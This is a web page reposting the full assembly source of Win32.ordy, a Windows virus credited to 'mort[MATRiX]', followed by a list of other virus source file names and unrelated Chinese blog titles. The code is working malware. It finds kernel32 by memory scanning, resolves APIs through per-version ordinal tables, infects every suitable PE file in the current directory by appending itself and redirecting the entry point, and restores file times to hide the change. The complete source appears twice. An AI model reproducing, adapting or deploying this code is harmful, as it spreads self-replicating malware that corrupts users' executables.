Win32_Ordy.asm
来源:互联网 发布:网站域名劫持违法吗 编辑:程序博客网 时间:2024/05/21 09:02
comment "
Win32.ordy by mort[MATRiX]
- simple direct action current dir last section PE appender
- using ordinal API values to access API
Well, in viriis there's mostly use some stuff to find APIs no matter
of kernel32.dll type,... I use APIs' ordinal values to access APIs.
API's address is counted right before it's used,...
When i searched for this values in different versions of widows,
i found they differ, so i included all ord values i was able to find.
U find them in ord.zip file in tools section.
I cant test thiss virii on all windoze versions. This one seems to be
good under win2k, anyway if u wanna run it under another, recheck
API's count,...
greetz All who helped me to create ordinal log
MiCr0s0fT - i founded my CreateFileA API DF sensitive,...
r there more? :)))
"
.486
.model flat,stdcall
extrn ExitProcess : proc
extrn MessageBoxA : proc
filetime struc
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
filetime ends
fileSearch struc
FileAttributes dd ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh dd ?
FileSizeLow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName db 0260h dup(?)
AlternateFileName db 13 dup(?)
db 3 dup(?)
fileSearch ends
_vSize = ((@retAdd - @ordy) / 0200h + 1) * 0200h
_DEBUG = 0
.data
dd ?
.code
@ordy:
mov eax,@retAdd - @ordy
push offset @retAdd
_retAddress equ $ - 4
pushad
call @SEH
add esp,8
mov esp,[esp]
pop dword ptr fs:[0]
pop eax
popad
ret
if _DEBUG
db 01000h dup(0) ;coz of debug symbols,...:(
endif
@SEH:
push dword ptr fs:[0]
mov dword ptr fs:[0],esp
xor eax,eax
call @findKernel
@delta label
mov ebp,[esp - 4] ;get delta handle
mov [ebp + _kBase - @delta],eax
mov ebx,eax ;get kernel values,...
add eax,dword ptr [eax + 03ch]
add eax,078h
mov eax,[eax]
add eax,ebx
add eax,018h
xchg eax,esi
lodsd
push eax
lodsd
add eax,ebx
mov [ebp + _addBase - @delta],eax
pop eax
lea edi,[ebp + _ordinals - @delta - (_ordEnd - _ordStart - 2)]
@nextOrdinal:
add edi,(_ordEnd - _ordStart) - 2
scasw
jnz @nextOrdinal
mov [ebp + _ordinalBase - @delta],edi
push 02000h
push 040h
mov eax,_GlobalAlloc
call @callAPI
push eax ;for GlobalFree
push eax
call @mask
db '*.*',0
@mask:
mov eax,_FindFirstFileA
call @callAPI
xchg eax,esi
@examine:
mov eax,[esp]
mov al,byte ptr [eax + FileAttributes]
and al,010h
cmp al,010h
jnz @fileFounded
@nextFile:
push dword ptr [esp]
push esi
mov eax,_FindNextFileA
call @callAPI
dec eax
jz @examine
mov eax,_GlobalFree
call @callAPI
xor eax,eax
sub eax,[esp + 030h] ;cause exception
@findKernel:
add eax,[esp + 030h]
and eax,0fffff000h
@nextPage:
sub eax,01000h
cmp word ptr [eax],'ZM'
jnz @nextPage
ret
;------------------------------------------------------------------------
@rw:
; edi - file handle
; eax - ReadFile/WriteFile
; edx - buffer
; ecx - size
pushad
push 0
call @fw
dd ?
@fw:
push ecx edx edi
call @callAPI
popad
ret
;------------------------------------------------------------------------
@fileFounded:
if _DEBUG
mov eax,[esp]
cmp dword ptr [eax + FileName],'SOHG'
jz @oki
jmp @nextFile
@oki:
endif
mov ebx,[esp]
mov eax,[ebx + FileSizeLow]
cmp eax,04000h
jb @nextFile
mov eax,dword ptr [ebx + FileName]
and dword ptr [ebx + LastWriteTime],eax
jz @nextFile
or dword ptr [ebx + LastWriteTime],eax
mov edx,_ReadFile
xchg eax,ebx
add eax,01000h
xchg eax,edx
call @openRW
push edx
push edi
mov eax,_CloseHandle
call @callAPI
pop edx
cld
mov edi,edx
mov eax,'EPZM'
scasw
jnz @nextFile
shr eax,010h
std
add edi,dword ptr [edi + 03ah]
scasw
scasw
jnz @nextFile
mov eax,[edi + 076h]
shl eax,3
add eax,052h
xchg eax,ebx
movzx eax,word ptr [edi + 8]
imul eax,028h
xadd ebx,eax
mov eax,_vSize
add [edi + 052h],eax ;add imagesize
xadd [ebx + edi + 010h],eax ;eax - old size
push eax
add eax,[ebx + edi + 014h] ;add phys. offset
mov [ebp + _virBodyPofs - @delta],eax
pop eax
add eax,[ebx + edi + 0ch]
xchg eax,[edi + 02ah] ;set/get entrypoint
add eax,[edi + 036h]
mov [ebp + _retAddress - @delta],eax ;set it,...
add dword ptr [ebx + edi + 08h],01000h ;add virtual size
or dword ptr [ebx + edi + 024h],0a0000020h
lea eax,[ebp + @finalInfection - @delta]
push eax
mov eax,_WriteFile
@openRW:
mov ecx,01000h
cld ;coz of CreateFileA DF sensitivity,...:)))
call @open
call @rw
ret
;------------------------------------------------------------------------
@setA:
push ebx
push eax
mov eax,_SetFileAttributesA
call @callAPI
ret
;-----------------------------------------------------------------------
_CloseHandle = 0 ;API handles
_CreateFileA = 2
_GlobalAlloc = 4
_GlobalFree = 6
_WriteFile = 8
_ReadFile = 0ah
_FindFirstFileA = 0ch
_FindNextFileA = 0eh
_SetEndOfFile = 010h
_SetFileTime = 012h
_SetFileAttributesA = 014h
_ordSize equ _ordEnd - _ordStart
;shl 2
_ordinals label
_ordStart label
_ordinals95 label
dw 0682 ;APIs num
dw 088h * 4 ;CloseHandle
dw 09dh * 4 ;CreateFileA
dw 01b5h * 4 ;GlobalAlloc
dw 01bch * 4 ;GlobalFree
dw 02e3h * 4 ;WriteFile
dw 0242h * 4 ;ReadFile
dw 0f9h * 4 ;FindFirstFileA
dw 0fch * 4 ;FindNextFile
dw 0281h * 4 ;SetEndOfFile
dw 028bh * 4 ;SetFileTime
dw 0288h * 4 ;SetFileAttributesA
_ordEnd label
_ordinals98 label ;(r1,SE)
dw 0745 ;APIs num
dw 09fh * 4 ;CloseHandle
dw 0b8h * 4 ;CreateFileA
dw 01e5h * 4 ;GlobalAlloc
dw 01ech * 4 ;GlobalFree
dw 0335h * 4 ;WriteFile
dw 027dh * 4 ;ReadFile
dw 011bh * 4 ;FindFirstFileA
dw 0120h * 4 ;FindNextFile
dw 02c5h * 4 ;SetEndOfFile
dw 02cfh * 4 ;SetFileTime
dw 02cch * 4 ;SetFileAttributesA
_ordinalsNT label
dw 02a1h ;APIs num
dw 018h * 4 ;CloseHandle
dw 031h * 4 ;CreateFileA
dw 0155h * 4 ;GlobalAlloc
dw 015ch * 4 ;GlobalFree
dw 027bh * 4 ;WriteFile
dw 01d6h * 4 ;ReadFile
dw 082h * 4 ;FindFirstFileA
dw 087h * 4 ;FindNextFile
dw 0210h * 4 ;SetEndOfFile
dw 021ah * 4 ;SetFileTime
dw 0217h * 4 ;SetFileAttributesA
_ordinals2k label
dw 0337h ;APIs num
dw 01eh * 4 ;CloseHandle
dw 037h * 4 ;CreateFileA
dw 019ch * 4 ;GlobalAlloc
dw 01a3h * 4 ;GlobalFree
dw 030eh * 4 ;WriteFile
dw 023dh * 4 ;ReadFile
dw 0a3h * 4 ;FindFirstFileA
dw 0ach * 4 ;FindNextFile
dw 028ch * 4 ;SetEndOfFile
dw 0297h * 4 ;SetFileTime
dw 0293h * 4 ;SetFileAttributesA
;------------------------------------------------------------------------
@open:
;eax - filename
pushad
mov eax,[esp + 028h]
add eax,FileName
push 0 0 3 0 1
push 080000000h or 040000000h
push eax
mov ebx,020h
call @setA
mov eax,_CreateFileA
call @callAPI
mov [esp],eax ;handle to edi
popad
ret
;-------------------------------------------------------
;eax - API handle
@callAPI:
pop edi
add eax,012345678h
_ordinalBase equ $ - 4
movzx eax,word ptr [eax]
add eax,012345678h
_addBase equ $ - 4
mov eax,[eax]
add eax,012345678h
_kBase equ $ - 4
call eax
jmp edi
;----------------------------------------------------------------
@finalInfection:
mov eax,012345678h
_virBodyPofs equ $ - 4
sub eax,01000h
push eax
mov eax,_ReadFile
xor ecx,ecx
inc ecx
@nextByte2Seek:
call @rw
dec dword ptr [esp]
jnz @nextByte2Seek
pop eax
mov ecx,_vSize
lea edx,[ebp + @ordy - @delta]
add eax,_WriteFile
call @rw
push esi
push edi edi
mov eax,_SetEndOfFile
call @callAPI
mov ebx,[esp]
mov eax,[esp + 0ch]
add eax,LastWriteTime
push eax
sub eax,8
push eax
sub eax,8
push eax
push ebx
mov eax,_SetFileTime
call @callAPI
mov eax,_CloseHandle
call @callAPI
mov ebx,[esp + 4]
mov eax,[ebx + FileAttributes]
xchg eax,ebx
add eax,FileName
call @setA
pop esi ;restore search handle
@fuckFile:
jmp @nextFile
@retAdd:
push 0
call @title
db '.ordy by mort[MATRiX]',0
@title:
call @mess
db 'hey guys, CreateFileA API is DF sensitive!!! :)))',0
@mess:
push 0
call MessageBoxA
call ExitProcess,0
ret
end @ordy
Win32.ordy by mort[MATRiX]
- simple direct action current dir last section PE appender
- using ordinal API values to access API
Well, in viriis there's mostly use some stuff to find APIs no matter
of kernel32.dll type,... I use APIs' ordinal values to access APIs.
API's address is counted right before it's used,...
When i searched for this values in different versions of widows,
i found they differ, so i included all ord values i was able to find.
U find them in ord.zip file in tools section.
I cant test thiss virii on all windoze versions. This one seems to be
good under win2k, anyway if u wanna run it under another, recheck
API's count,...
greetz All who helped me to create ordinal log
MiCr0s0fT - i founded my CreateFileA API DF sensitive,...
r there more? :)))
"
.486
.model flat,stdcall
extrn ExitProcess : proc
extrn MessageBoxA : proc
filetime struc
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
filetime ends
fileSearch struc
FileAttributes dd ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh dd ?
FileSizeLow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName db 0260h dup(?)
AlternateFileName db 13 dup(?)
db 3 dup(?)
fileSearch ends
_vSize = ((@retAdd - @ordy) / 0200h + 1) * 0200h
_DEBUG = 0
.data
dd ?
.code
@ordy:
mov eax,@retAdd - @ordy
push offset @retAdd
_retAddress equ $ - 4
pushad
call @SEH
add esp,8
mov esp,[esp]
pop dword ptr fs:[0]
pop eax
popad
ret
if _DEBUG
db 01000h dup(0) ;coz of debug symbols,...:(
endif
@SEH:
push dword ptr fs:[0]
mov dword ptr fs:[0],esp
xor eax,eax
call @findKernel
@delta label
mov ebp,[esp - 4] ;get delta handle
mov [ebp + _kBase - @delta],eax
mov ebx,eax ;get kernel values,...
add eax,dword ptr [eax + 03ch]
add eax,078h
mov eax,[eax]
add eax,ebx
add eax,018h
xchg eax,esi
lodsd
push eax
lodsd
add eax,ebx
mov [ebp + _addBase - @delta],eax
pop eax
lea edi,[ebp + _ordinals - @delta - (_ordEnd - _ordStart - 2)]
@nextOrdinal:
add edi,(_ordEnd - _ordStart) - 2
scasw
jnz @nextOrdinal
mov [ebp + _ordinalBase - @delta],edi
push 02000h
push 040h
mov eax,_GlobalAlloc
call @callAPI
push eax ;for GlobalFree
push eax
call @mask
db '*.*',0
@mask:
mov eax,_FindFirstFileA
call @callAPI
xchg eax,esi
@examine:
mov eax,[esp]
mov al,byte ptr [eax + FileAttributes]
and al,010h
cmp al,010h
jnz @fileFounded
@nextFile:
push dword ptr [esp]
push esi
mov eax,_FindNextFileA
call @callAPI
dec eax
jz @examine
mov eax,_GlobalFree
call @callAPI
xor eax,eax
sub eax,[esp + 030h] ;cause exception
@findKernel:
add eax,[esp + 030h]
and eax,0fffff000h
@nextPage:
sub eax,01000h
cmp word ptr [eax],'ZM'
jnz @nextPage
ret
;------------------------------------------------------------------------
@rw:
; edi - file handle
; eax - ReadFile/WriteFile
; edx - buffer
; ecx - size
pushad
push 0
call @fw
dd ?
@fw:
push ecx edx edi
call @callAPI
popad
ret
;------------------------------------------------------------------------
@fileFounded:
if _DEBUG
mov eax,[esp]
cmp dword ptr [eax + FileName],'SOHG'
jz @oki
jmp @nextFile
@oki:
endif
mov ebx,[esp]
mov eax,[ebx + FileSizeLow]
cmp eax,04000h
jb @nextFile
mov eax,dword ptr [ebx + FileName]
and dword ptr [ebx + LastWriteTime],eax
jz @nextFile
or dword ptr [ebx + LastWriteTime],eax
mov edx,_ReadFile
xchg eax,ebx
add eax,01000h
xchg eax,edx
call @openRW
push edx
push edi
mov eax,_CloseHandle
call @callAPI
pop edx
cld
mov edi,edx
mov eax,'EPZM'
scasw
jnz @nextFile
shr eax,010h
std
add edi,dword ptr [edi + 03ah]
scasw
scasw
jnz @nextFile
mov eax,[edi + 076h]
shl eax,3
add eax,052h
xchg eax,ebx
movzx eax,word ptr [edi + 8]
imul eax,028h
xadd ebx,eax
mov eax,_vSize
add [edi + 052h],eax ;add imagesize
xadd [ebx + edi + 010h],eax ;eax - old size
push eax
add eax,[ebx + edi + 014h] ;add phys. offset
mov [ebp + _virBodyPofs - @delta],eax
pop eax
add eax,[ebx + edi + 0ch]
xchg eax,[edi + 02ah] ;set/get entrypoint
add eax,[edi + 036h]
mov [ebp + _retAddress - @delta],eax ;set it,...
add dword ptr [ebx + edi + 08h],01000h ;add virtual size
or dword ptr [ebx + edi + 024h],0a0000020h
lea eax,[ebp + @finalInfection - @delta]
push eax
mov eax,_WriteFile
@openRW:
mov ecx,01000h
cld ;coz of CreateFileA DF sensitivity,...:)))
call @open
call @rw
ret
;------------------------------------------------------------------------
@setA:
push ebx
push eax
mov eax,_SetFileAttributesA
call @callAPI
ret
;-----------------------------------------------------------------------
_CloseHandle = 0 ;API handles
_CreateFileA = 2
_GlobalAlloc = 4
_GlobalFree = 6
_WriteFile = 8
_ReadFile = 0ah
_FindFirstFileA = 0ch
_FindNextFileA = 0eh
_SetEndOfFile = 010h
_SetFileTime = 012h
_SetFileAttributesA = 014h
_ordSize equ _ordEnd - _ordStart
;shl 2
_ordinals label
_ordStart label
_ordinals95 label
dw 0682 ;APIs num
dw 088h * 4 ;CloseHandle
dw 09dh * 4 ;CreateFileA
dw 01b5h * 4 ;GlobalAlloc
dw 01bch * 4 ;GlobalFree
dw 02e3h * 4 ;WriteFile
dw 0242h * 4 ;ReadFile
dw 0f9h * 4 ;FindFirstFileA
dw 0fch * 4 ;FindNextFile
dw 0281h * 4 ;SetEndOfFile
dw 028bh * 4 ;SetFileTime
dw 0288h * 4 ;SetFileAttributesA
_ordEnd label
_ordinals98 label ;(r1,SE)
dw 0745 ;APIs num
dw 09fh * 4 ;CloseHandle
dw 0b8h * 4 ;CreateFileA
dw 01e5h * 4 ;GlobalAlloc
dw 01ech * 4 ;GlobalFree
dw 0335h * 4 ;WriteFile
dw 027dh * 4 ;ReadFile
dw 011bh * 4 ;FindFirstFileA
dw 0120h * 4 ;FindNextFile
dw 02c5h * 4 ;SetEndOfFile
dw 02cfh * 4 ;SetFileTime
dw 02cch * 4 ;SetFileAttributesA
_ordinalsNT label
dw 02a1h ;APIs num
dw 018h * 4 ;CloseHandle
dw 031h * 4 ;CreateFileA
dw 0155h * 4 ;GlobalAlloc
dw 015ch * 4 ;GlobalFree
dw 027bh * 4 ;WriteFile
dw 01d6h * 4 ;ReadFile
dw 082h * 4 ;FindFirstFileA
dw 087h * 4 ;FindNextFile
dw 0210h * 4 ;SetEndOfFile
dw 021ah * 4 ;SetFileTime
dw 0217h * 4 ;SetFileAttributesA
_ordinals2k label
dw 0337h ;APIs num
dw 01eh * 4 ;CloseHandle
dw 037h * 4 ;CreateFileA
dw 019ch * 4 ;GlobalAlloc
dw 01a3h * 4 ;GlobalFree
dw 030eh * 4 ;WriteFile
dw 023dh * 4 ;ReadFile
dw 0a3h * 4 ;FindFirstFileA
dw 0ach * 4 ;FindNextFile
dw 028ch * 4 ;SetEndOfFile
dw 0297h * 4 ;SetFileTime
dw 0293h * 4 ;SetFileAttributesA
;------------------------------------------------------------------------
@open:
;eax - filename
pushad
mov eax,[esp + 028h]
add eax,FileName
push 0 0 3 0 1
push 080000000h or 040000000h
push eax
mov ebx,020h
call @setA
mov eax,_CreateFileA
call @callAPI
mov [esp],eax ;handle to edi
popad
ret
;-------------------------------------------------------
;eax - API handle
@callAPI:
pop edi
add eax,012345678h
_ordinalBase equ $ - 4
movzx eax,word ptr [eax]
add eax,012345678h
_addBase equ $ - 4
mov eax,[eax]
add eax,012345678h
_kBase equ $ - 4
call eax
jmp edi
;----------------------------------------------------------------
@finalInfection:
mov eax,012345678h
_virBodyPofs equ $ - 4
sub eax,01000h
push eax
mov eax,_ReadFile
xor ecx,ecx
inc ecx
@nextByte2Seek:
call @rw
dec dword ptr [esp]
jnz @nextByte2Seek
pop eax
mov ecx,_vSize
lea edx,[ebp + @ordy - @delta]
add eax,_WriteFile
call @rw
push esi
push edi edi
mov eax,_SetEndOfFile
call @callAPI
mov ebx,[esp]
mov eax,[esp + 0ch]
add eax,LastWriteTime
push eax
sub eax,8
push eax
sub eax,8
push eax
push ebx
mov eax,_SetFileTime
call @callAPI
mov eax,_CloseHandle
call @callAPI
mov ebx,[esp + 4]
mov eax,[ebx + FileAttributes]
xchg eax,ebx
add eax,FileName
call @setA
pop esi ;restore search handle
@fuckFile:
jmp @nextFile
@retAdd:
push 0
call @title
db '.ordy by mort[MATRiX]',0
@title:
call @mess
db 'hey guys, CreateFileA API is DF sensitive!!! :)))',0
@mess:
push 0
call MessageBoxA
call ExitProcess,0
ret
end @ordy
- Win32_Ordy.asm
- asm
- ASM
- asm
- asm
- asm
- ASM
- asm
- ASM
- ASM
- ASM
- ASM
- asm迁移到asm
- asm迁移到asm
- brfa.asm
- FleA.asm
- Mates.asm
- shithead.asm
- Win32_Screenfector.asm
- Win32_Savior.asm
- Win32_Spit.asm
- Win32_Winux.asm
- Win32_Voodoo.asm
- Win32_Ordy.asm
- Win32_Project2501.asm
- HQL 发现一个小问题: 用foreign连的话 在 where里面既然id需要“Id”,而其他的 如username 只要“userName”!
- Win32_Plexar.asm
- 教训--编译mysql要先安装libgcc
- Win32_Redemption_9216.asm
- 《Undocumented Windows 2000 Secrets》翻译 --- 第五章(4)
- (转载)HP-UX系统维护基本命令和常用配置文件
- 365key为什么要支持tag和使用建议
